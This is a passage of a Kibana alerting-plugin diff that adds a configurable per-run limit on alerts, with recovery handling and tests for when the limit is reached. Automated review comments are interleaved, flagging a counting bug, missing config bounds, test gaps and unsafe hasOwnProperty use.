@@ -25,6 +25,7 @@ export interface CreateAlertFactoryOpts< > { alerts: Record>; logger: Logger; + maxAlerts: number; canSetRecoveryContext?: boolean; } @@ -32,21 +33,40 @@ export function createAlertFactory< State extends AlertInstanceState, Context extends AlertInstanceContext, ActionGroupIds extends string ->({ alerts, logger, canSetRecoveryContext = false }: CreateAlertFactoryOpts) { +>({ + alerts, + logger, + maxAlerts, + canSetRecoveryContext = false, +}: CreateAlertFactoryOpts) { // Keep track of which alerts we started with so we can determine which have recovered const originalAlerts = cloneDeep(alerts); + + // Number of alerts reported + let numAlertsCreated = 0; + + // Whether the number of alerts reported has reached max allowed + let hasReachedAlertLimit = false; + let isDone = false; return { create: (id: string): PublicAlert => { if (isDone) { throw new Error(`Can't create new alerts after calling done() in AlertsFactory.`); } + + if (numAlertsCreated++ >= maxAlerts) { + hasReachedAlertLimit = true; + throw new Error(`Rule reported more than ${maxAlerts} alerts.`); + } + if (!alerts[id]) { alerts[id] = new Alert(id); } return alerts[id]; }, + hasReachedAlertLimit: (): boolean => hasReachedAlertLimit, done: (): AlertFactoryDoneUtils => { isDone = true; return { @@ -59,8 +79,12 @@ export function createAlertFactory< } const { recoveredAlerts } = processAlerts( - alerts, - originalAlerts + { + alerts, + existingAlerts: originalAlerts, + hasReachedAlertLimit, + alertLimit: maxAlerts, + } ); return Object.keys(recoveredAlerts ?? {}).map( (alertId: string) => recoveredAlerts[alertId] diff --git a/x-pack/plugins/alerting/server/config.test.ts b/x-pack/plugins/alerting/server/config.test.ts index 08ef06921a143..ec6f2f6565d67 100644 --- a/x-pack/plugins/alerting/server/config.test.ts +++ b/x-pack/plugins/alerting/server/config.test.ts 
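Review bot: `numAlertsCreated++ >= maxAlerts` in `create()` counts every call rather than distinct alert ids, because the increment happens before the `if (!alerts[id])` check; a rule type that calls `create(id)` twice for the same alert in one run consumes two slots and can trip the limit with fewer than `maxAlerts` real alerts. If repeated `create(id)` for one id is legitimate for some rule types, count only ids not yet reported this run, e.g. `const reported = new Set<string>();` and `if (!reported.has(id) && reported.size >= maxAlerts) { hasReachedAlertLimit = true; throw new Error(...); }` followed by `reported.add(id)`. The counter also keeps incrementing after the throw, which is harmless but deserves a comment since `hasReachedAlertLimit` is the only state read by `done()`. Note the flag is set only when the limit is exceeded (the `maxAlerts + 1`th call), matching the "more than" wording, so callers must not expect it to be true at exactly `maxAlerts`. The body of `createAlertFactory` extends beyond this hunk.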
@@ -30,6 +30,9 @@ describe('config validation', () => { "actions": Object { "max": 100000, }, + "alerts": Object { + "max": 1000, + }, }, }, } diff --git a/x-pack/plugins/alerting/server/config.ts b/x-pack/plugins/alerting/server/config.ts index 4f283917a460a..f6becbf192b05 100644 --- a/x-pack/plugins/alerting/server/config.ts +++ b/x-pack/plugins/alerting/server/config.ts @@ -43,6 +43,9 @@ const rulesSchema = schema.object({ max: schema.number({ defaultValue: 100000, max: 100000 }), connectorTypeOverrides: schema.maybe(schema.arrayOf(connectorTypeSchema)), }), + alerts: schema.object({ + max: schema.number({ defaultValue: 1000 }), + }), ruleTypeOverrides: schema.maybe(schema.arrayOf(ruleTypeSchema)), }), }); diff --git a/x-pack/plugins/alerting/server/constants/translations.ts b/x-pack/plugins/alerting/server/constants/translations.ts index ee1d711b56f8d..15442cf8efc57 100644 --- a/x-pack/plugins/alerting/server/constants/translations.ts +++ b/x-pack/plugins/alerting/server/constants/translations.ts @@ -17,6 +17,10 @@ export const translations = { 'The maximum number of actions for this rule type was reached; excess actions were not triggered.', } ), + maxAlerts: i18n.translate('xpack.alerting.taskRunner.warning.maxAlerts', { + defaultMessage: + 'Rule reported more than the maximum number of alerts in a single run. Alerts may be missed and recovery notifications may be delayed', + }), }, }, }; diff --git a/x-pack/plugins/alerting/server/lib/alerting_event_logger/alerting_event_logger.test.ts b/x-pack/plugins/alerting/server/lib/alerting_event_logger/alerting_event_logger.test.ts index 766e2c77531f3..74fe762f87b3a 100644 --- a/x-pack/plugins/alerting/server/lib/alerting_event_logger/alerting_event_logger.test.ts +++ b/x-pack/plugins/alerting/server/lib/alerting_event_logger/alerting_event_logger.test.ts 
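Review bot: `alerts.max` is added with only a `defaultValue`, whereas the sibling `actions.max` two lines above is bounded with `max: 100000`; a configured `0` or negative value makes `createAlertFactory`'s `numAlertsCreated++ >= maxAlerts` throw on the very first `create()`, disabling every rule, and an arbitrarily large value removes the resource cap this setting exists to provide. Add at least a lower bound, `max: schema.number({ defaultValue: 1000, min: 1 })`, and consider an upper bound consistent with the `actions.max` cap. The `config.test.ts` snapshot in the preceding hunk is unaffected by adding bounds.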
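Review bot: The new `maxAlerts` defaultMessage ends without a period while the adjacent `maxExecutableActions` message ends with one, so the two warnings render inconsistently where they are shown side by side; change the string to `'Rule reported more than the maximum number of alerts in a single run. Alerts may be missed and recovery notifications may be delayed.'`. Since this is an i18n default, the trailing punctuation becomes part of the translation source and is cheaper to settle now than after translators pick it up.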
@@ -653,6 +653,7 @@ describe('AlertingEventLogger', () => { numSearches: 6, esSearchDurationMs: 3300, totalSearchDurationMs: 10333, + hasReachedAlertLimit: false, triggeredActionsStatus: ActionsCompletion.COMPLETE, }, }); diff --git a/x-pack/plugins/alerting/server/lib/get_rule_task_timeout.test.ts b/x-pack/plugins/alerting/server/lib/get_rule_task_timeout.test.ts index 9336c380c1742..59d4260261ebb 100644 --- a/x-pack/plugins/alerting/server/lib/get_rule_task_timeout.test.ts +++ b/x-pack/plugins/alerting/server/lib/get_rule_task_timeout.test.ts @@ -37,6 +37,7 @@ const configWithoutTimeout = { ...config, run: { actions: { max: 1000 }, + alerts: { max: 1000 }, }, }; diff --git a/x-pack/plugins/alerting/server/lib/process_alerts.test.ts b/x-pack/plugins/alerting/server/lib/process_alerts.test.ts index a242ac471ad11..dcf13bdc4f7a1 100644 --- a/x-pack/plugins/alerting/server/lib/process_alerts.test.ts +++ b/x-pack/plugins/alerting/server/lib/process_alerts.test.ts @@ -30,13 +30,13 @@ describe('processAlerts', () => { const existingAlert1 = new Alert<{}, {}, DefaultActionGroupId>('2'); const existingAlert2 = new Alert<{}, {}, DefaultActionGroupId>('3'); - const originalAlerts = { + const existingAlerts = { '2': existingAlert1, '3': existingAlert2, }; const updatedAlerts = { - ...cloneDeep(originalAlerts), + ...cloneDeep(existingAlerts), '1': newAlert, }; @@ -44,8 +44,14 @@ describe('processAlerts', () => { updatedAlerts['2'].scheduleActions('default', { foo: '1' }); updatedAlerts['3'].scheduleActions('default', { foo: '2' }); - // @ts-expect-error - const { newAlerts } = processAlerts(updatedAlerts, originalAlerts); + const { newAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: false, + alertLimit: 10, + }); expect(newAlerts).toEqual({ '1': newAlert }); }); 
@@ -56,13 +62,13 @@ describe('processAlerts', () => { const existingAlert1 = new Alert<{}, {}, DefaultActionGroupId>('3'); const existingAlert2 = new Alert<{}, {}, DefaultActionGroupId>('4'); - const originalAlerts = { + const existingAlerts = { '3': existingAlert1, '4': existingAlert2, }; const updatedAlerts = { - ...cloneDeep(originalAlerts), + ...cloneDeep(existingAlerts), '1': newAlert1, '2': newAlert2, }; @@ -75,8 +81,14 @@ describe('processAlerts', () => { expect(newAlert1.getState()).toStrictEqual({}); expect(newAlert2.getState()).toStrictEqual({}); - // @ts-expect-error - const { newAlerts } = processAlerts(updatedAlerts, originalAlerts); + const { newAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: false, + alertLimit: 10, + }); expect(newAlerts).toEqual({ '1': newAlert1, '2': newAlert2 }); @@ -106,13 +118,13 @@ describe('processAlerts', () => { const existingAlert1 = new Alert<{}, {}, DefaultActionGroupId>('2'); const existingAlert2 = new Alert<{}, {}, DefaultActionGroupId>('3'); - const originalAlerts = { + const existingAlerts = { '2': existingAlert1, '3': existingAlert2, }; const updatedAlerts = { - ...cloneDeep(originalAlerts), + ...cloneDeep(existingAlerts), '1': newAlert, }; @@ -120,8 +132,14 @@ describe('processAlerts', () => { updatedAlerts['2'].scheduleActions('default', { foo: '1' }); updatedAlerts['3'].scheduleActions('default', { foo: '2' }); - // @ts-expect-error - const { activeAlerts } = processAlerts(updatedAlerts, originalAlerts); + const { activeAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: false, + alertLimit: 10, + }); expect(activeAlerts).toEqual({ '1': updatedAlerts['1'], 
@@ -135,15 +153,15 @@ describe('processAlerts', () => { const existingAlert1 = new Alert<{}, {}, DefaultActionGroupId>('2'); const existingAlert2 = new Alert<{}, {}, DefaultActionGroupId>('3'); - const originalAlerts = { + const existingAlerts = { '2': existingAlert1, '3': existingAlert2, }; - originalAlerts['2'].replaceState({ start: '1969-12-30T00:00:00.000Z', duration: 33000 }); - originalAlerts['3'].replaceState({ start: '1969-12-31T07:34:00.000Z', duration: 23532 }); + existingAlerts['2'].replaceState({ start: '1969-12-30T00:00:00.000Z', duration: 33000 }); + existingAlerts['3'].replaceState({ start: '1969-12-31T07:34:00.000Z', duration: 23532 }); const updatedAlerts = { - ...cloneDeep(originalAlerts), + ...cloneDeep(existingAlerts), '1': newAlert, }; @@ -151,8 +169,14 @@ describe('processAlerts', () => { updatedAlerts['2'].scheduleActions('default', { foo: '1' }); updatedAlerts['3'].scheduleActions('default', { foo: '2' }); - // @ts-expect-error - const { activeAlerts } = processAlerts(updatedAlerts, originalAlerts); + const { activeAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: false, + alertLimit: 10, + }); expect(activeAlerts).toEqual({ '1': updatedAlerts['1'], @@ -184,13 +208,13 @@ describe('processAlerts', () => { const existingAlert1 = new Alert<{}, {}, DefaultActionGroupId>('2'); const existingAlert2 = new Alert<{}, {}, DefaultActionGroupId>('3'); - const originalAlerts = { + const existingAlerts = { '2': existingAlert1, '3': existingAlert2, }; const updatedAlerts = { - ...cloneDeep(originalAlerts), + ...cloneDeep(existingAlerts), '1': newAlert, }; 
@@ -198,8 +222,14 @@ describe('processAlerts', () => { updatedAlerts['2'].scheduleActions('default', { foo: '1' }); updatedAlerts['3'].scheduleActions('default', { foo: '2' }); - // @ts-expect-error - const { activeAlerts } = processAlerts(updatedAlerts, originalAlerts); + const { activeAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: false, + alertLimit: 10, + }); expect(activeAlerts).toEqual({ '1': updatedAlerts['1'], @@ -231,23 +261,23 @@ describe('processAlerts', () => { const existingAlert1 = new Alert<{}, {}, DefaultActionGroupId>('2'); const existingAlert2 = new Alert<{}, {}, DefaultActionGroupId>('3'); - const originalAlerts = { + const existingAlerts = { '2': existingAlert1, '3': existingAlert2, }; - originalAlerts['2'].replaceState({ + existingAlerts['2'].replaceState({ stateField1: 'xyz', start: '1969-12-30T00:00:00.000Z', duration: 33000, }); - originalAlerts['3'].replaceState({ + existingAlerts['3'].replaceState({ anotherState: true, start: '1969-12-31T07:34:00.000Z', duration: 23532, }); const updatedAlerts = { - ...cloneDeep(originalAlerts), + ...cloneDeep(existingAlerts), '1': newAlert, }; @@ -255,8 +285,14 @@ describe('processAlerts', () => { updatedAlerts['2'].scheduleActions('default', { foo: '1' }); updatedAlerts['3'].scheduleActions('default', { foo: '2' }); - // @ts-expect-error - const { activeAlerts } = processAlerts(updatedAlerts, originalAlerts); + const { activeAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: false, + alertLimit: 10, + }); expect(activeAlerts).toEqual({ '1': updatedAlerts['1'], 
@@ -294,18 +330,24 @@ describe('processAlerts', () => { const activeAlert = new Alert<{}, {}, DefaultActionGroupId>('1'); const recoveredAlert = new Alert<{}, {}, DefaultActionGroupId>('2'); - const originalAlerts = { + const existingAlerts = { '1': activeAlert, '2': recoveredAlert, }; - const updatedAlerts = cloneDeep(originalAlerts); + const updatedAlerts = cloneDeep(existingAlerts); updatedAlerts['1'].scheduleActions('default', { foo: '1' }); updatedAlerts['2'].setContext({ foo: '2' }); - // @ts-expect-error - const { recoveredAlerts } = processAlerts(updatedAlerts, originalAlerts); + const { recoveredAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: false, + alertLimit: 10, + }); expect(recoveredAlerts).toEqual({ '2': updatedAlerts['2'] }); }); @@ -314,19 +356,25 @@ describe('processAlerts', () => { const activeAlert = new Alert<{}, {}, DefaultActionGroupId>('1'); const notRecoveredAlert = new Alert<{}, {}, DefaultActionGroupId>('2'); - const originalAlerts = { + const existingAlerts = { '1': activeAlert, }; const updatedAlerts = { - ...cloneDeep(originalAlerts), + ...cloneDeep(existingAlerts), '2': notRecoveredAlert, }; updatedAlerts['1'].scheduleActions('default', { foo: '1' }); - // @ts-expect-error - const { recoveredAlerts } = processAlerts(updatedAlerts, originalAlerts); + const { recoveredAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: false, + alertLimit: 10, + }); expect(recoveredAlerts).toEqual({}); }); 
@@ -336,20 +384,26 @@ describe('processAlerts', () => { const recoveredAlert1 = new Alert<{}, {}, DefaultActionGroupId>('2'); const recoveredAlert2 = new Alert<{}, {}, DefaultActionGroupId>('3'); - const originalAlerts = { + const existingAlerts = { '1': activeAlert, '2': recoveredAlert1, '3': recoveredAlert2, }; - originalAlerts['2'].replaceState({ start: '1969-12-30T00:00:00.000Z', duration: 33000 }); - originalAlerts['3'].replaceState({ start: '1969-12-31T07:34:00.000Z', duration: 23532 }); + existingAlerts['2'].replaceState({ start: '1969-12-30T00:00:00.000Z', duration: 33000 }); + existingAlerts['3'].replaceState({ start: '1969-12-31T07:34:00.000Z', duration: 23532 }); - const updatedAlerts = cloneDeep(originalAlerts); + const updatedAlerts = cloneDeep(existingAlerts); updatedAlerts['1'].scheduleActions('default', { foo: '1' }); - // @ts-expect-error - const { recoveredAlerts } = processAlerts(updatedAlerts, originalAlerts); + const { recoveredAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: false, + alertLimit: 10, + }); expect(recoveredAlerts).toEqual({ '2': updatedAlerts['2'], '3': updatedAlerts['3'] }); 
@@ -377,17 +431,23 @@ describe('processAlerts', () => { const recoveredAlert1 = new Alert<{}, {}, DefaultActionGroupId>('2'); const recoveredAlert2 = new Alert<{}, {}, DefaultActionGroupId>('3'); - const originalAlerts = { + const existingAlerts = { '1': activeAlert, '2': recoveredAlert1, '3': recoveredAlert2, }; - const updatedAlerts = cloneDeep(originalAlerts); + const updatedAlerts = cloneDeep(existingAlerts); updatedAlerts['1'].scheduleActions('default', { foo: '1' }); - // @ts-expect-error - const { recoveredAlerts } = processAlerts(updatedAlerts, originalAlerts); + const { recoveredAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: false, + alertLimit: 10, + }); expect(recoveredAlerts).toEqual({ '2': updatedAlerts['2'], '3': updatedAlerts['3'] }); 
@@ -410,4 +470,156 @@ describe('processAlerts', () => { expect(recoveredAlert2State.end).not.toBeDefined(); }); }); + + describe('when hasReachedAlertLimit is true', () => { + test('does not calculate recovered alerts', () => { + const existingAlert1 = new Alert<{}, {}, DefaultActionGroupId>('1'); + const existingAlert2 = new Alert<{}, {}, DefaultActionGroupId>('2'); + const existingAlert3 = new Alert<{}, {}, DefaultActionGroupId>('3'); + const existingAlert4 = new Alert<{}, {}, DefaultActionGroupId>('4'); + const existingAlert5 = new Alert<{}, {}, DefaultActionGroupId>('5'); + const newAlert6 = new Alert<{}, {}, DefaultActionGroupId>('6'); + const newAlert7 = new Alert<{}, {}, DefaultActionGroupId>('7'); + + const existingAlerts = { + '1': existingAlert1, + '2': existingAlert2, + '3': existingAlert3, + '4': existingAlert4, + '5': existingAlert5, + }; + + const updatedAlerts = { + ...cloneDeep(existingAlerts), + '6': newAlert6, + '7': newAlert7, + }; + + updatedAlerts['1'].scheduleActions('default', { foo: '1' }); + updatedAlerts['2'].scheduleActions('default', { foo: '1' }); + updatedAlerts['3'].scheduleActions('default', { foo: '2' }); + updatedAlerts['4'].scheduleActions('default', { foo: '2' }); + // intentionally not scheduling actions for alert "5" + updatedAlerts['6'].scheduleActions('default', { foo: '2' }); + updatedAlerts['7'].scheduleActions('default', { foo: '2' }); + + const { recoveredAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: true, + alertLimit: 7, + }); + + expect(recoveredAlerts).toEqual({}); + }); + + test('persists existing alerts', () => { + const existingAlert1 = new Alert<{}, {}, DefaultActionGroupId>('1'); + const existingAlert2 = new Alert<{}, {}, DefaultActionGroupId>('2'); + const existingAlert3 = new Alert<{}, {}, DefaultActionGroupId>('3'); + const existingAlert4 = new Alert<{}, {}, DefaultActionGroupId>('4'); + const existingAlert5 = new 
Alert<{}, {}, DefaultActionGroupId>('5'); + + const existingAlerts = { + '1': existingAlert1, + '2': existingAlert2, + '3': existingAlert3, + '4': existingAlert4, + '5': existingAlert5, + }; + + const updatedAlerts = cloneDeep(existingAlerts); + + updatedAlerts['1'].scheduleActions('default', { foo: '1' }); + updatedAlerts['2'].scheduleActions('default', { foo: '1' }); + updatedAlerts['3'].scheduleActions('default', { foo: '2' }); + updatedAlerts['4'].scheduleActions('default', { foo: '2' }); + // intentionally not scheduling actions for alert "5" + + const { activeAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: true, + alertLimit: 7, + }); + + expect(activeAlerts).toEqual({ + '1': updatedAlerts['1'], + '2': updatedAlerts['2'], + '3': updatedAlerts['3'], + '4': updatedAlerts['4'], + '5': existingAlert5, + }); + }); + + test('adds new alerts up to max allowed', () => { + const MAX_ALERTS = 7; + const existingAlert1 = new Alert<{}, {}, DefaultActionGroupId>('1'); + const existingAlert2 = new Alert<{}, {}, DefaultActionGroupId>('2'); + const existingAlert3 = new Alert<{}, {}, DefaultActionGroupId>('3'); + const existingAlert4 = new Alert<{}, {}, DefaultActionGroupId>('4'); + const existingAlert5 = new Alert<{}, {}, DefaultActionGroupId>('5'); + const newAlert6 = new Alert<{}, {}, DefaultActionGroupId>('6'); + const newAlert7 = new Alert<{}, {}, DefaultActionGroupId>('7'); + const newAlert8 = new Alert<{}, {}, DefaultActionGroupId>('8'); + const newAlert9 = new Alert<{}, {}, DefaultActionGroupId>('9'); + const newAlert10 = new Alert<{}, {}, DefaultActionGroupId>('10'); + + const existingAlerts = { + '1': existingAlert1, + '2': existingAlert2, + '3': existingAlert3, + '4': existingAlert4, + '5': existingAlert5, + }; + + const updatedAlerts = { + ...cloneDeep(existingAlerts), + '6': newAlert6, + '7': newAlert7, + '8': newAlert8, + '9': newAlert9, + '10': newAlert10, + }; + + 
updatedAlerts['1'].scheduleActions('default', { foo: '1' }); + updatedAlerts['2'].scheduleActions('default', { foo: '1' }); + updatedAlerts['3'].scheduleActions('default', { foo: '2' }); + updatedAlerts['4'].scheduleActions('default', { foo: '2' }); + // intentionally not scheduling actions for alert "5" + updatedAlerts['6'].scheduleActions('default', { foo: '2' }); + updatedAlerts['7'].scheduleActions('default', { foo: '2' }); + updatedAlerts['8'].scheduleActions('default', { foo: '2' }); + updatedAlerts['9'].scheduleActions('default', { foo: '2' }); + updatedAlerts['10'].scheduleActions('default', { foo: '2' }); + + const { activeAlerts, newAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: true, + alertLimit: MAX_ALERTS, + }); + + expect(Object.keys(activeAlerts).length).toEqual(MAX_ALERTS); + expect(activeAlerts).toEqual({ + '1': updatedAlerts['1'], + '2': updatedAlerts['2'], + '3': updatedAlerts['3'], + '4': updatedAlerts['4'], + '5': existingAlert5, + '6': newAlert6, + '7': newAlert7, + }); + expect(newAlerts).toEqual({ + '6': newAlert6, + '7': newAlert7, + }); + }); + }); }); diff --git a/x-pack/plugins/alerting/server/lib/process_alerts.ts b/x-pack/plugins/alerting/server/lib/process_alerts.ts index f4af401e5113c..c0352a06f2eba 100644 --- a/x-pack/plugins/alerting/server/lib/process_alerts.ts +++ b/x-pack/plugins/alerting/server/lib/process_alerts.ts 
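Review bot: The new `when hasReachedAlertLimit is true` block does not exercise the early-return branch of `processAlertsLimitReached`, where the existing alerts already fill or exceed `alertLimit` and no new alerts may be admitted (`if (!hasCapacityForNewAlerts()) return { recoveredAlerts: {}, newAlerts: {}, activeAlerts }`). The three tests use five existing alerts against a limit of 7, so that path is never taken. A fourth case such as `test('does not add new alerts when existing alerts already fill the limit', …)` with five existing alerts, two new ones and `alertLimit: 5`, asserting `newAlerts` is `{}` and `activeAlerts` holds only the five existing ids, would cover it, and ideally a sibling case with the limit lower than the existing count to confirm existing alerts are never dropped.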
@@ -6,9 +6,19 @@ */ import { millisToNanos } from '@kbn/event-log-plugin/server'; +import { cloneDeep } from 'lodash'; import { Alert } from '../alert'; import { AlertInstanceState, AlertInstanceContext } from '../types'; +interface ProcessAlertsOpts< + State extends AlertInstanceState, + Context extends AlertInstanceContext +> { + alerts: Record>; + existingAlerts: Record>; + hasReachedAlertLimit: boolean; + alertLimit: number; +} interface ProcessAlertsResult< State extends AlertInstanceState, Context extends AlertInstanceContext, @@ -25,11 +35,32 @@ export function processAlerts< Context extends AlertInstanceContext, ActionGroupIds extends string, RecoveryActionGroupId extends string +>({ + alerts, + existingAlerts, + hasReachedAlertLimit, + alertLimit, +}: ProcessAlertsOpts): ProcessAlertsResult< + State, + Context, + ActionGroupIds, + RecoveryActionGroupId +> { + return hasReachedAlertLimit + ? processAlertsLimitReached(alerts, existingAlerts, alertLimit) + : processAlertsHelper(alerts, existingAlerts); +} + +function processAlertsHelper< + State extends AlertInstanceState, + Context extends AlertInstanceContext, + ActionGroupIds extends string, + RecoveryActionGroupId extends string >( alerts: Record>, - originalAlerts: Record> + existingAlerts: Record> ): ProcessAlertsResult { - const originalAlertIds = new Set(Object.keys(originalAlerts)); + const existingAlertIds = new Set(Object.keys(existingAlerts)); const currentTime = new Date().toISOString(); const newAlerts: Record> = {}; @@ -43,7 +74,7 @@ export function processAlerts< activeAlerts[id] = alerts[id]; // if this alert did not exist in previous run, it is considered "new" - if (!originalAlertIds.has(id)) { + if (!existingAlertIds.has(id)) { newAlerts[id] = alerts[id]; // Inject start time into alert state for new alerts 
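Review bot: The new `ProcessAlertsOpts` interface in the first hunk documents none of its fields, although the two new ones change how the function behaves: `hasReachedAlertLimit` switches recovery detection off entirely and `alertLimit` caps the number of active alerts returned. A short TSDoc line per field would save the next reader a trip into `processAlertsLimitReached`, for instance `/** True when the alert factory stopped accepting alerts this run; recovered alerts are then not computed and all existing alerts stay active. */` on `hasReachedAlertLimit` and `/** Upper bound on active alerts returned when the limit was reached; new alerts are admitted only up to this count. */` on `alertLimit`, with `alerts` described as the alerts reported this run and `existingAlerts` as the snapshot from the end of the previous run used to tell new from recovered alerts.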
@@ -52,7 +83,7 @@ export function processAlerts< } else { // this alert did exist in previous run // calculate duration to date for active alerts - const state = originalAlerts[id].getState(); + const state = existingAlerts[id].getState(); const durationInMs = new Date(currentTime).valueOf() - new Date(state.start as string).valueOf(); const duration = state.start ? millisToNanos(durationInMs) : undefined; @@ -62,7 +93,7 @@ export function processAlerts< ...(duration !== undefined ? { duration } : {}), }); } - } else if (originalAlertIds.has(id)) { + } else if (existingAlertIds.has(id)) { recoveredAlerts[id] = alerts[id]; // Inject end time into alert state of recovered alerts 
@@ -80,3 +111,76 @@ export function processAlerts< } return { recoveredAlerts, newAlerts, activeAlerts }; } + +function processAlertsLimitReached< + State extends AlertInstanceState, + Context extends AlertInstanceContext, + ActionGroupIds extends string, + RecoveryActionGroupId extends string +>( + alerts: Record>, + existingAlerts: Record>, + alertLimit: number +): ProcessAlertsResult { + const existingAlertIds = new Set(Object.keys(existingAlerts)); + + // When the alert limit has been reached, + // - skip determination of recovered alerts + // - pass through all existing alerts as active + // - add any new alerts, up to the max allowed + + const currentTime = new Date().toISOString(); + const newAlerts: Record> = {}; + + // all existing alerts stay active + const activeAlerts: Record> = cloneDeep( + existingAlerts + ); + + // update duration for existing alerts + for (const id in activeAlerts) { + if (activeAlerts.hasOwnProperty(id)) { + if (alerts.hasOwnProperty(id)) { + activeAlerts[id] = alerts[id]; + } + const state = existingAlerts[id].getState(); + const durationInMs = + new Date(currentTime).valueOf() - new Date(state.start as string).valueOf(); + const duration = state.start ? millisToNanos(durationInMs) : undefined; + activeAlerts[id].replaceState({ + ...state, + ...(state.start ? { start: state.start } : {}), + ...(duration !== undefined ? 
{ duration } : {}), + }); + } + } + + function hasCapacityForNewAlerts() { + return Object.keys(activeAlerts).length < alertLimit; + } + + // if we don't have capacity for new alerts, return + if (!hasCapacityForNewAlerts()) { + return { recoveredAlerts: {}, newAlerts: {}, activeAlerts }; + } + + // look for new alerts and add until we hit capacity + for (const id in alerts) { + if (alerts.hasOwnProperty(id) && alerts[id].hasScheduledActions()) { + // if this alert did not exist in previous run, it is considered "new" + if (!existingAlertIds.has(id)) { + activeAlerts[id] = alerts[id]; + newAlerts[id] = alerts[id]; + + // Inject start time into alert state for new alerts + const state = newAlerts[id].getState(); + newAlerts[id].replaceState({ ...state, start: currentTime, duration: '0' }); + + if (!hasCapacityForNewAlerts()) { + break; + } + } + } + } + return { recoveredAlerts: {}, newAlerts, activeAlerts }; +} diff --git a/x-pack/plugins/alerting/server/lib/rule_execution_status.test.ts b/x-pack/plugins/alerting/server/lib/rule_execution_status.test.ts index 8551bb00287c7..69c90ed812549 100644 --- a/x-pack/plugins/alerting/server/lib/rule_execution_status.test.ts +++ b/x-pack/plugins/alerting/server/lib/rule_execution_status.test.ts @@ -31,6 +31,7 @@ const executionMetrics = { numberOfActiveAlerts: 2, numberOfNewAlerts: 3, numberOfRecoveredAlerts: 13, + hasReachedAlertLimit: false, triggeredActionsStatus: ActionsCompletion.COMPLETE, }; @@ -48,6 +49,7 @@ describe('RuleExecutionStatus', () => { expect(received.numberOfActiveAlerts).toEqual(expected.numberOfActiveAlerts); expect(received.numberOfRecoveredAlerts).toEqual(expected.numberOfRecoveredAlerts); expect(received.numberOfNewAlerts).toEqual(expected.numberOfNewAlerts); + expect(received.hasReachedAlertLimit).toEqual(expected.hasReachedAlertLimit); expect(received.triggeredActionsStatus).toEqual(expected.triggeredActionsStatus); } 
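Review bot: `processAlertsLimitReached` calls `hasOwnProperty` directly on the alert maps (`activeAlerts.hasOwnProperty(id)`, `alerts.hasOwnProperty(id)`), and these maps are plain objects keyed by rule-supplied alert ids, which rule types commonly derive from indexed data such as host or entity names. If an id ever equals an `Object.prototype` member name, `alerts.hasOwnProperty` resolves to that Alert instance rather than the method and the loop throws a TypeError, failing the whole rule run on the limit path. Use `Object.prototype.hasOwnProperty.call(alerts, id)` (and the same for `activeAlerts`), or iterate with `for (const [id, alert] of Object.entries(alerts))`, which needs no ownership check at all; this also satisfies the usual `no-prototype-builtins` lint rule. The whole function is within the hunk.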
@@ -89,7 +91,7 @@ describe('RuleExecutionStatus', () => { testExpectedMetrics(metrics!, executionMetrics); }); - test('task state with warning', () => { + test('task state with max executable actions warning', () => { const { status, metrics } = executionStatusFromState({ alertInstances: { a: {} }, metrics: { ...executionMetrics, triggeredActionsStatus: ActionsCompletion.PARTIAL }, @@ -107,6 +109,25 @@ describe('RuleExecutionStatus', () => { triggeredActionsStatus: ActionsCompletion.PARTIAL, }); }); + + test('task state with max alerts warning', () => { + const { status, metrics } = executionStatusFromState({ + alertInstances: { a: {} }, + metrics: { ...executionMetrics, hasReachedAlertLimit: true }, + }); + checkDateIsNearNow(status.lastExecutionDate); + expect(status.warning).toEqual({ + message: translations.taskRunner.warning.maxAlerts, + reason: RuleExecutionStatusWarningReasons.MAX_ALERTS, + }); + expect(status.status).toBe('warning'); + expect(status.error).toBe(undefined); + + testExpectedMetrics(metrics!, { + ...executionMetrics, + hasReachedAlertLimit: true, + }); + }); }); describe('executionStatusFromError()', () => { diff --git a/x-pack/plugins/alerting/server/lib/rule_execution_status.ts b/x-pack/plugins/alerting/server/lib/rule_execution_status.ts index 28eaf24ef8a2d..c852ca5899420 100644 --- a/x-pack/plugins/alerting/server/lib/rule_execution_status.ts +++ b/x-pack/plugins/alerting/server/lib/rule_execution_status.ts 
@@ -30,26 +30,31 @@ export function executionStatusFromState( ): IExecutionStatusAndMetrics { const alertIds = Object.keys(stateWithMetrics.alertInstances ?? {}); - const hasIncompleteAlertExecution = - stateWithMetrics.metrics.triggeredActionsStatus === ActionsCompletion.PARTIAL; - let status: RuleExecutionStatuses = alertIds.length === 0 ? RuleExecutionStatusValues[0] : RuleExecutionStatusValues[1]; - if (hasIncompleteAlertExecution) { + // Check for warning states + let warning = null; + // We only have a single warning field so prioritizing the alert circuit breaker over the actions circuit breaker + if (stateWithMetrics.metrics.hasReachedAlertLimit) { + status = RuleExecutionStatusValues[5]; + warning = { + reason: RuleExecutionStatusWarningReasons.MAX_ALERTS, + message: translations.taskRunner.warning.maxAlerts, + }; + } else if (stateWithMetrics.metrics.triggeredActionsStatus === ActionsCompletion.PARTIAL) { status = RuleExecutionStatusValues[5]; + warning = { + reason: RuleExecutionStatusWarningReasons.MAX_EXECUTABLE_ACTIONS, + message: translations.taskRunner.warning.maxExecutableActions, 